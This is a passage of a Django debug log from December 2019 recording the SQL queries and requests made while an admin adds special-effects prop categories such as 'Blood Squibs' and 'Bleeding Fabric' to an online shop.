'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-27T13:15:02.579062+00:00'::timestamptz WHERE "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 27, 13, 15, 2, 579062, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') [13/Dec/2019 13:15:02] "GET /shop/category/add/ HTTP/1.0" 200 9010 DEBUG 2019-12-13 13:15:02,917 utils 11259 139831317362432 (0.005) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-13T13:15:02.904299+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 13, 13, 15, 2, 904299, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-13 13:15:02,921 utils 11259 139831317362432 (0.002) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) [13/Dec/2019 13:15:02] "GET /jsi18n/ HTTP/1.0" 200 3223 DEBUG 2019-12-13 13:15:47,978 utils 11259 139831317362432 (0.004) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-13T13:15:47.966051+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 13, 13, 15, 47, 966051, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-13 13:15:47,982 utils 11259 139831317362432 (0.002) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-13 13:15:47,991 utils 11259 139831317362432 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 8; args=(8,) DEBUG 2019-12-13 13:15:47,996 utils 11259 139831317362432 (0.001) SELECT (1) AS "a" FROM "shop_category" WHERE "shop_category"."id" = 8 LIMIT 1; args=(8,) DEBUG 2019-12-13 13:15:47,999 utils 11259 139831317362432 (0.001) SELECT (1) AS "a" FROM "shop_category" WHERE ("shop_category"."parent_id" = 8 AND "shop_category"."slug" = 'gun-wounds') LIMIT 1; args=(8, 'gun-wounds') DEBUG 2019-12-13 13:15:48,000 utils 11259 139831317362432 (0.000) SELECT (1) AS "a" FROM "shop_category" WHERE "shop_category"."name" = 'Gun Wounds' LIMIT 1; args=('Gun Wounds',) DEBUG 2019-12-13 13:15:48,003 utils 11259 139831317362432 (0.001) SELECT "shop_category"."lft", "shop_category"."rght", "shop_category"."level", "shop_category"."tree_id" FROM "shop_category" WHERE "shop_category"."id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC LIMIT 1; args=(8,) DEBUG 2019-12-13 13:15:48,005 utils 11259 139831317362432 (0.001) UPDATE "shop_category" SET "lft" = CASE WHEN "lft" > 1 THEN "lft" + 2 ELSE "lft" END, "rght" = CASE WHEN "rght" > 1 THEN "rght" + 2 ELSE "rght" END WHERE "tree_id" = 7 AND ("lft" > 1 OR "rght" > 1); args=[1, 2, 1, 2, 7, 1, 1] DEBUG 2019-12-13 13:15:48,008 utils 11259 139831317362432 (0.001) INSERT INTO "shop_category" ("name", "parent_id", "image", "description", "popular", "slug", "lft", "rght", "tree_id", "level") VALUES ('Gun Wounds', 8, 'categories/2019/12/13/collection8.png', 'Gun Wounds', false, 'gun-wounds', 2, 3, 7, 1) RETURNING "shop_category"."id"; args=('Gun Wounds', 8, 'categories/2019/12/13/collection8.png', 'Gun Wounds', False, 'gun-wounds', 2, 3, 7, 1) DEBUG 2019-12-13 13:15:48,011 utils 11259 139831317362432 (0.001) INSERT INTO "django_admin_log" ("action_time", "user_id", "content_type_id", "object_id", "object_repr", "action_flag", "change_message") VALUES ('2019-12-13T13:15:48.009503+00:00'::timestamptz, 6, 8, '40', 'Gun Wounds', 1, '[{"added": {}}]') RETURNING "django_admin_log"."id"; args=(datetime.datetime(2019, 12, 13, 13, 15, 48, 9503, tzinfo=), 6, 8, '40', 'Gun Wounds', 1, '[{"added": {}}]') [13/Dec/2019 13:15:48] "POST /shop/category/add/ HTTP/1.0" 302 0 DEBUG 2019-12-13 13:15:48,320 utils 11259 139831317362432 (0.004) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-13T13:15:48.307429+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 13, 13, 15, 48, 307429, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-13 13:15:48,323 utils 11259 139831317362432 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-13 13:15:48,390 utils 11259 139831317362432 (0.003) DECLARE "_django_curs_139831317362432_1" NO SCROLL CURSOR WITH HOLD FOR SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-13 13:15:48,482 utils 11259 139831317362432 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-27T13:15:48.479800+00:00'::timestamptz WHERE "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 27, 13, 15, 48, 479800, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') [13/Dec/2019 13:15:48] "GET /shop/category/add/ HTTP/1.0" 200 9061 DEBUG 2019-12-13 13:15:48,820 utils 11259 139831317362432 (0.004) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-13T13:15:48.809297+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 13, 13, 15, 48, 809297, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-13 13:15:48,824 utils 11259 139831317362432 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) [13/Dec/2019 13:15:48] "GET /jsi18n/ HTTP/1.0" 200 3223 DEBUG 2019-12-13 13:16:12,923 utils 11259 139831317362432 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-13T13:16:12.912752+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 13, 13, 16, 12, 912752, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-13 13:16:12,928 utils 11259 139831317362432 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-13 13:16:12,935 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 8; args=(8,) DEBUG 2019-12-13 13:16:12,939 utils 11259 139831317362432 (0.000) SELECT (1) AS "a" FROM "shop_category" WHERE "shop_category"."id" = 8 LIMIT 1; args=(8,) DEBUG 2019-12-13 13:16:12,941 utils 11259 139831317362432 (0.000) SELECT (1) AS "a" FROM "shop_category" WHERE ("shop_category"."parent_id" = 8 AND "shop_category"."slug" = 'blood-squibs') LIMIT 1; args=(8, 'blood-squibs') DEBUG 2019-12-13 13:16:12,942 utils 11259 139831317362432 (0.000) SELECT (1) AS "a" FROM "shop_category" WHERE "shop_category"."name" = 'Blood Squibs' LIMIT 1; args=('Blood Squibs',) DEBUG 2019-12-13 13:16:12,946 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE ("shop_category"."name" > 'Blood Squibs' AND "shop_category"."parent_id" = 8) ORDER BY "shop_category"."name" ASC, "shop_category"."lft" ASC LIMIT 1; args=('Blood Squibs', 8) DEBUG 2019-12-13 13:16:12,948 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 8; args=(8,) DEBUG 2019-12-13 13:16:12,950 utils 11259 139831317362432 (0.001) UPDATE "shop_category" SET "lft" = CASE WHEN "lft" > 1 THEN "lft" + 2 ELSE "lft" END, "rght" = CASE WHEN "rght" > 1 THEN "rght" + 2 ELSE "rght" END WHERE "tree_id" = 7 AND ("lft" > 1 OR "rght" > 1); args=[1, 2, 1, 2, 7, 1, 1] DEBUG 2019-12-13 13:16:12,954 utils 11259 139831317362432 (0.001) INSERT INTO "shop_category" ("name", "parent_id", "image", "description", "popular", "slug", "lft", "rght", "tree_id", "level") VALUES ('Blood Squibs', 8, 'categories/2019/12/13/collection8_MKX5n4Y.png', 'Blood Squibs', false, 'blood-squibs', 2, 3, 7, 1) RETURNING "shop_category"."id"; args=('Blood Squibs', 8, 'categories/2019/12/13/collection8_MKX5n4Y.png', 'Blood Squibs', False, 'blood-squibs', 2, 3, 7, 1) DEBUG 2019-12-13 13:16:12,956 utils 11259 139831317362432 (0.001) INSERT INTO "django_admin_log" ("action_time", "user_id", "content_type_id", "object_id", "object_repr", "action_flag", "change_message") VALUES ('2019-12-13T13:16:12.954942+00:00'::timestamptz, 6, 8, '41', 'Blood Squibs', 1, '[{"added": {}}]') RETURNING "django_admin_log"."id"; args=(datetime.datetime(2019, 12, 13, 13, 16, 12, 954942, tzinfo=), 6, 8, '41', 'Blood Squibs', 1, '[{"added": {}}]') [13/Dec/2019 13:16:12] "POST /shop/category/add/ HTTP/1.0" 302 0 DEBUG 2019-12-13 13:16:13,256 utils 11259 139831317362432 (0.004) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-13T13:16:13.244096+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 13, 13, 16, 13, 244096, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-13 13:16:13,260 utils 11259 139831317362432 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-13 13:16:13,316 utils 11259 139831317362432 (0.003) DECLARE "_django_curs_139831317362432_1" NO SCROLL CURSOR WITH HOLD FOR SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-13 13:16:13,378 utils 11259 139831317362432 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-27T13:16:13.376053+00:00'::timestamptz WHERE "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 27, 13, 16, 13, 376053, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') [13/Dec/2019 13:16:13] "GET /shop/category/add/ HTTP/1.0" 200 9111 DEBUG 2019-12-13 13:16:13,736 utils 11259 139831317362432 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-13T13:16:13.727381+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 13, 13, 16, 13, 727381, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-13 13:16:13,739 utils 11259 139831317362432 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) [13/Dec/2019 13:16:13] "GET /jsi18n/ HTTP/1.0" 200 3223 DEBUG 2019-12-13 13:16:30,362 utils 11259 139831317362432 (0.004) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-13T13:16:30.347561+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 13, 13, 16, 30, 347561, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-13 13:16:30,366 utils 11259 139831317362432 (0.002) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-13 13:16:30,378 utils 11259 139831317362432 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 8; args=(8,) DEBUG 2019-12-13 13:16:30,383 utils 11259 139831317362432 (0.001) SELECT (1) AS "a" FROM "shop_category" WHERE "shop_category"."id" = 8 LIMIT 1; args=(8,) DEBUG 2019-12-13 13:16:30,386 utils 11259 139831317362432 (0.001) SELECT (1) AS "a" FROM "shop_category" WHERE ("shop_category"."parent_id" = 8 AND "shop_category"."slug" = 'blood-splatter') LIMIT 1; args=(8, 'blood-splatter') DEBUG 2019-12-13 13:16:30,389 utils 11259 139831317362432 (0.001) SELECT (1) AS "a" FROM "shop_category" WHERE "shop_category"."name" = 'Blood Splatter' LIMIT 1; args=('Blood Splatter',) DEBUG 2019-12-13 13:16:30,396 utils 11259 139831317362432 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE ("shop_category"."name" > 'Blood Splatter' AND "shop_category"."parent_id" = 8) ORDER BY "shop_category"."name" ASC, "shop_category"."lft" ASC LIMIT 1; args=('Blood Splatter', 8) DEBUG 2019-12-13 13:16:30,400 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 8; args=(8,) DEBUG 2019-12-13 13:16:30,403 utils 11259 139831317362432 (0.001) UPDATE "shop_category" SET "lft" = CASE WHEN "lft" > 1 THEN "lft" + 2 ELSE "lft" END, "rght" = CASE WHEN "rght" > 1 THEN "rght" + 2 ELSE "rght" END WHERE "tree_id" = 7 AND ("lft" > 1 OR "rght" > 1); args=[1, 2, 1, 2, 7, 1, 1] DEBUG 2019-12-13 13:16:30,408 utils 11259 139831317362432 (0.001) INSERT INTO "shop_category" ("name", "parent_id", "image", "description", "popular", "slug", "lft", "rght", "tree_id", "level") VALUES ('Blood Splatter', 8, 'categories/2019/12/13/collection8_qT6o4Ze.png', 'Blood Splatter', false, 'blood-splatter', 2, 3, 7, 1) RETURNING "shop_category"."id"; args=('Blood Splatter', 8, 'categories/2019/12/13/collection8_qT6o4Ze.png', 'Blood Splatter', False, 'blood-splatter', 2, 3, 7, 1) DEBUG 2019-12-13 13:16:30,412 utils 11259 139831317362432 (0.001) INSERT INTO "django_admin_log" ("action_time", "user_id", "content_type_id", "object_id", "object_repr", "action_flag", "change_message") VALUES ('2019-12-13T13:16:30.409634+00:00'::timestamptz, 6, 8, '42', 'Blood Splatter', 1, '[{"added": {}}]') RETURNING "django_admin_log"."id"; args=(datetime.datetime(2019, 12, 13, 13, 16, 30, 409634, tzinfo=), 6, 8, '42', 'Blood Splatter', 1, '[{"added": {}}]') [13/Dec/2019 13:16:30] "POST /shop/category/add/ HTTP/1.0" 302 0 DEBUG 2019-12-13 13:16:30,720 utils 11259 139831317362432 (0.004) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-13T13:16:30.706748+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 13, 13, 16, 30, 706748, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-13 13:16:30,724 utils 11259 139831317362432 (0.002) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-13 13:16:30,797 utils 11259 139831317362432 (0.003) DECLARE "_django_curs_139831317362432_1" NO SCROLL CURSOR WITH HOLD FOR SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-13 13:16:30,855 utils 11259 139831317362432 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-27T13:16:30.853300+00:00'::timestamptz WHERE "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 27, 13, 16, 30, 853300, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') [13/Dec/2019 13:16:30] "GET /shop/category/add/ HTTP/1.0" 200 9163 DEBUG 2019-12-13 13:16:31,193 utils 11259 139831317362432 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-13T13:16:31.183481+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 13, 13, 16, 31, 183481, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-13 13:16:31,195 utils 11259 139831317362432 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) [13/Dec/2019 13:16:31] "GET /jsi18n/ HTTP/1.0" 200 3223 DEBUG 2019-12-13 13:16:48,606 utils 11259 139831317362432 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-13T13:16:48.596882+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 13, 13, 16, 48, 596882, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-13 13:16:48,609 utils 11259 139831317362432 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-13 13:16:48,616 utils 11259 139831317362432 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 8; args=(8,) DEBUG 2019-12-13 13:16:48,619 utils 11259 139831317362432 (0.000) SELECT (1) AS "a" FROM "shop_category" WHERE "shop_category"."id" = 8 LIMIT 1; args=(8,) DEBUG 2019-12-13 13:16:48,621 utils 11259 139831317362432 (0.001) SELECT (1) AS "a" FROM "shop_category" WHERE ("shop_category"."parent_id" = 8 AND "shop_category"."slug" = 'bleeding-fabric') LIMIT 1; args=(8, 'bleeding-fabric') DEBUG 2019-12-13 13:16:48,623 utils 11259 139831317362432 (0.000) SELECT (1) AS "a" FROM "shop_category" WHERE "shop_category"."name" = 'Bleeding Fabric' LIMIT 1; args=('Bleeding Fabric',) DEBUG 2019-12-13 13:16:48,627 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE ("shop_category"."name" > 'Bleeding Fabric' AND "shop_category"."parent_id" = 8) ORDER BY "shop_category"."name" ASC, "shop_category"."lft" ASC LIMIT 1; args=('Bleeding Fabric', 8) DEBUG 2019-12-13 13:16:48,629 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 8; args=(8,) DEBUG 2019-12-13 13:16:48,630 utils 11259 139831317362432 (0.001) UPDATE "shop_category" SET "lft" = CASE WHEN "lft" > 1 THEN "lft" + 2 ELSE "lft" END, "rght" = CASE WHEN "rght" > 1 THEN "rght" + 2 ELSE "rght" END WHERE "tree_id" = 7 AND ("lft" > 1 OR "rght" > 1); args=[1, 2, 1, 2, 7, 1, 1] DEBUG 2019-12-13 13:16:48,633 utils 11259 139831317362432 (0.001) INSERT INTO "shop_category" ("name", "parent_id", "image", "description", "popular", "slug", "lft", "rght", "tree_id", "level") VALUES ('Bleeding Fabric', 8, 'categories/2019/12/13/collection8_98NdtQd.png', 'Bleeding Fabric', false, 'bleeding-fabric', 2, 3, 7, 1) RETURNING "shop_category"."id"; args=('Bleeding Fabric', 8, 'categories/2019/12/13/collection8_98NdtQd.png', 'Bleeding Fabric', False, 'bleeding-fabric', 2, 3, 7, 1) DEBUG 2019-12-13 13:16:48,635 utils 11259 139831317362432 (0.001) INSERT INTO "django_admin_log" ("action_time", "user_id", "content_type_id", "object_id", "object_repr", "action_flag", "change_message") VALUES ('2019-12-13T13:16:48.634223+00:00'::timestamptz, 6, 8, '43', 'Bleeding Fabric', 1, '[{"added": {}}]') RETURNING "django_admin_log"."id"; args=(datetime.datetime(2019, 12, 13, 13, 16, 48, 634223, tzinfo=), 6, 8, '43', 'Bleeding Fabric', 1, '[{"added": {}}]') [13/Dec/2019 